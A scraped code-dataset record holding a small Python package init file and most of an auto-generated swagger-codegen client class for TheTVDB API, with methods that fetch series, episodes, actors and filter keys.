| 0
| 0
| 0
| 1
|
0
| 8
|
78e731df4869e70f8e9615578e4491150bf9e8c9
| 110
|
py
|
Python
|
helpers/__init__.py
|
ichach-m-i-sc/docker-webexteams-bot-example
|
781932646951164554ae39abb442e5f0acacb491
|
[
"MIT"
] | 4
|
2019-01-26T20:53:44.000Z
|
2020-01-20T19:43:37.000Z
|
helpers/__init__.py
|
ichach-m-i-sc/docker-webexteams-bot-example
|
781932646951164554ae39abb442e5f0acacb491
|
[
"MIT"
] | 6
|
2021-04-29T19:07:04.000Z
|
2021-05-03T15:01:07.000Z
|
helpers/__init__.py
|
ichach-m-i-sc/docker-webexteams-bot-example
|
781932646951164554ae39abb442e5f0acacb491
|
[
"MIT"
] | 4
|
2018-11-10T20:35:11.000Z
|
2021-04-29T19:03:00.000Z
|
from .yaml_helper import *
from .ngrok_helper import *
from .spark_helper import *
from .html_helper import *
| 22
| 27
| 0.781818
| 16
| 110
| 5.125
| 0.4375
| 0.585366
| 0.585366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 110
| 4
| 28
| 27.5
| 0.87234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
601066abad8001fab3800918885a958b07b2ee49
| 58,930
|
py
|
Python
|
tvdb_api/api/series_api.py
|
h3llrais3r/tvdbapi-v2-client
|
1210df9dd5869ccc5b63149b1b80630310a14f40
|
[
"MIT"
] | 2
|
2021-01-24T07:45:22.000Z
|
2021-11-15T11:29:25.000Z
|
tvdb_api/api/series_api.py
|
h3llrais3r/tvdb_api_v2
|
1210df9dd5869ccc5b63149b1b80630310a14f40
|
[
"MIT"
] | null | null | null |
tvdb_api/api/series_api.py
|
h3llrais3r/tvdb_api_v2
|
1210df9dd5869ccc5b63149b1b80630310a14f40
|
[
"MIT"
] | 1
|
2020-05-07T10:16:15.000Z
|
2020-05-07T10:16:15.000Z
|
# coding: utf-8
"""
TheTVDB API v2
API v3 targets v2 functionality with a few minor additions. The API is accessible via https://api.thetvdb.com and provides the following REST endpoints in JSON format. How to use this API documentation ---------------- You may browse the API routes without authentication, but if you wish to send requests to the API and see response data, then you must authenticate. 1. Obtain a JWT token by `POST`ing to the `/login` route in the `Authentication` section with your API key and credentials. 1. Paste the JWT token from the response into the \"JWT Token\" field at the top of the page and click the 'Add Token' button. You will now be able to use the remaining routes to send requests to the API and get a response. Language Selection ---------------- Language selection is done via the `Accept-Language` header. At the moment, you may only pass one language abbreviation in the header at a time. Valid language abbreviations can be found at the `/languages` route.. Authentication ---------------- Authentication to use the API is similar to the How-to section above. Users must `POST` to the `/login` route with their API key and credentials in the following format in order to obtain a JWT token. `{\"apikey\":\"APIKEY\",\"username\":\"USERNAME\",\"userkey\":\"USERKEY\"}` Note that the username and key are ONLY required for the `/user` routes. The user's key is labled `Account Identifier` in the account section of the main site. The token is then used in all subsequent requests by providing it in the `Authorization` header. The header will look like: `Authorization: Bearer <yourJWTtoken>`. Currently, the token expires after 24 hours. You can `GET` the `/refresh_token` route to extend that expiration date. Versioning ---------------- You may request a different version of the API by including an `Accept` header in your request with the following format: `Accept:application/vnd.thetvdb.v$VERSION`. 
This documentation automatically uses the version seen at the top and bottom of the page. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tvdb_api.api_client import ApiClient
class SeriesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def series_id_actors_get(self, id, **kwargs):  # noqa: E501
    """series_id_actors_get  # noqa: E501

    Returns actors for the given series id  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_actors_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :return: SeriesActors
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # async: hand back the request thread untouched
        return self.series_id_actors_get_with_http_info(id, **kwargs)  # noqa: E501
    (data) = self.series_id_actors_get_with_http_info(id, **kwargs)  # noqa: E501
    return data
def series_id_actors_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_actors_get  # noqa: E501

    Returns actors for the given series id  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_actors_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :return: SeriesActors
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_actors_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if 'id' not in params or params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `series_id_actors_get`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/actors', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesActors',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_episodes_get(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_get  # noqa: E501

    All episodes for a given series. Paginated with 100 results per page.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str page: Page of results to fetch. Defaults to page 1 if not provided.
    :return: SeriesEpisodes
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # async: hand back the request thread untouched
        return self.series_id_episodes_get_with_http_info(id, **kwargs)  # noqa: E501
    (data) = self.series_id_episodes_get_with_http_info(id, **kwargs)  # noqa: E501
    return data
def series_id_episodes_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_get  # noqa: E501

    All episodes for a given series. Paginated with 100 results per page.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str page: Page of results to fetch. Defaults to page 1 if not provided.
    :return: SeriesEpisodes
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'page']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_episodes_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/episodes' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    # Optional pagination passed as a query-string parameter.
    query_params = []
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/episodes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesEpisodes',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_episodes_query_get(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_query_get  # noqa: E501

    This route allows the user to query against episodes for the given series. The response is a paginated array of episode records.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_query_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str absolute_number: Absolute number of the episode
    :param str aired_season: Aired season number
    :param str aired_episode: Aired episode number
    :param str dvd_season: DVD season number
    :param str dvd_episode: DVD episode number
    :param str imdb_id: IMDB id of the series
    :param str page: Page of results to fetch. Defaults to page 1 if not provided.
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesEpisodesQuery
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_episodes_query_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_episodes_query_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_query_get  # noqa: E501

    This route allows the user to query against episodes for the given series. The response is a paginated array of episode records.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_query_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str absolute_number: Absolute number of the episode
    :param str aired_season: Aired season number
    :param str aired_episode: Aired episode number
    :param str dvd_season: DVD season number
    :param str dvd_episode: DVD episode number
    :param str imdb_id: IMDB id of the series
    :param str page: Page of results to fetch. Defaults to page 1 if not provided.
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesEpisodesQuery
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'absolute_number', 'aired_season', 'aired_episode', 'dvd_season', 'dvd_episode', 'imdb_id', 'page', 'accept_language']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_episodes_query_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_query_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/episodes/query' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    # Optional filters; note the snake_case -> camelCase mapping of the
    # wire-format query keys.
    query_params = []
    if 'absolute_number' in params:
        query_params.append(('absoluteNumber', params['absolute_number']))  # noqa: E501
    if 'aired_season' in params:
        query_params.append(('airedSeason', params['aired_season']))  # noqa: E501
    if 'aired_episode' in params:
        query_params.append(('airedEpisode', params['aired_episode']))  # noqa: E501
    if 'dvd_season' in params:
        query_params.append(('dvdSeason', params['dvd_season']))  # noqa: E501
    if 'dvd_episode' in params:
        query_params.append(('dvdEpisode', params['dvd_episode']))  # noqa: E501
    if 'imdb_id' in params:
        query_params.append(('imdbId', params['imdb_id']))  # noqa: E501
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501

    # Optional translation request via the Accept-Language header.
    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/episodes/query', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesEpisodesQuery',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_episodes_query_params_get(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_query_params_get  # noqa: E501

    Returns the allowed query keys for the `/series/{id}/episodes/query` route  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_query_params_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :return: SeriesEpisodesQueryParams
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_episodes_query_params_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_episodes_query_params_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_query_params_get  # noqa: E501

    Returns the allowed query keys for the `/series/{id}/episodes/query` route  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_query_params_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :return: SeriesEpisodesQueryParams
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_episodes_query_params_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_query_params_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/episodes/query/params' path.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/episodes/query/params', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesEpisodesQueryParams',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_episodes_summary_get(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_summary_get  # noqa: E501

    Returns a summary of the episodes and seasons available for the series. __Note__: Season \"0\" is for all episodes that are considered to be specials.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_summary_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :return: SeriesEpisodesSummary
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_episodes_summary_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_episodes_summary_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_episodes_summary_get  # noqa: E501

    Returns a summary of the episodes and seasons available for the series. __Note__: Season \"0\" is for all episodes that are considered to be specials.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_episodes_summary_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :return: SeriesEpisodesSummary
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_episodes_summary_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_summary_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/episodes/summary' path.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/episodes/summary', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesEpisodesSummary',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_filter_get(self, id, keys, **kwargs):  # noqa: E501
    """series_id_filter_get  # noqa: E501

    Returns a series records, filtered by the supplied comma-separated list of keys. Query keys can be found at the `/series/{id}/filter/params` route.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_filter_get(id, keys, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str keys: Comma-separated list of keys to filter by (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_filter_get_with_http_info(id, keys, **kwargs)  # noqa: E501
def series_id_filter_get_with_http_info(self, id, keys, **kwargs):  # noqa: E501
    """series_id_filter_get  # noqa: E501

    Returns a series records, filtered by the supplied comma-separated list of keys. Query keys can be found at the `/series/{id}/filter/params` route.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_filter_get_with_http_info(id, keys, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str keys: Comma-separated list of keys to filter by (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'keys', 'accept_language']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id`, `keys` and
    # `kwargs`; validated kwargs are folded in and `kwargs` removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_filter_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_filter_get`")  # noqa: E501
    # verify the required parameter 'keys' is set
    if ('keys' not in params or
            params['keys'] is None):
        raise ValueError("Missing the required parameter `keys` when calling `series_id_filter_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/filter' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    # The comma-separated field list is sent as a query parameter.
    query_params = []
    if 'keys' in params:
        query_params.append(('keys', params['keys']))  # noqa: E501

    # Optional translation request via the Accept-Language header.
    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/filter', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SeriesData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_filter_params_get(self, id, **kwargs):  # noqa: E501
    """series_id_filter_params_get  # noqa: E501

    Returns the list of keys available for the `/series/{id}/filter` route  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_filter_params_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: FilterKeys
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_filter_params_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_filter_params_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_filter_params_get  # noqa: E501

    Returns the list of keys available for the `/series/{id}/filter` route  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_filter_params_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: FilterKeys
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'accept_language']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_filter_params_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_filter_params_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}/filter/params' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    # Optional translation request via the Accept-Language header.
    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['jwtToken']  # noqa: E501

    return self.api_client.call_api(
        '/series/{id}/filter/params', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='FilterKeys',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def series_id_get(self, id, **kwargs):  # noqa: E501
    """series_id_get  # noqa: E501

    Returns a series records that contains all information known about a particular series id.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: always return only the payload, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Async callers get the request thread, sync callers get the
    # deserialized data; either way the helper's result passes through.
    return self.series_id_get_with_http_info(id, **kwargs)  # noqa: E501
def series_id_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """series_id_get  # noqa: E501

    Returns a series records that contains all information known about a particular series id.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.series_id_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: ID of the series (required)
    :param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
    :return: SeriesData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keywords this endpoint accepts, plus the request-control options
    # shared by every generated method.
    all_params = ['id', 'accept_language']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() deliberately captures `self`, `id` and `kwargs`;
    # validated kwargs are folded in and the raw `kwargs` entry removed.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method series_id_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `series_id_get`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '/series/{id}' path template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    # Optional translation request via the Accept-Language header.
    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

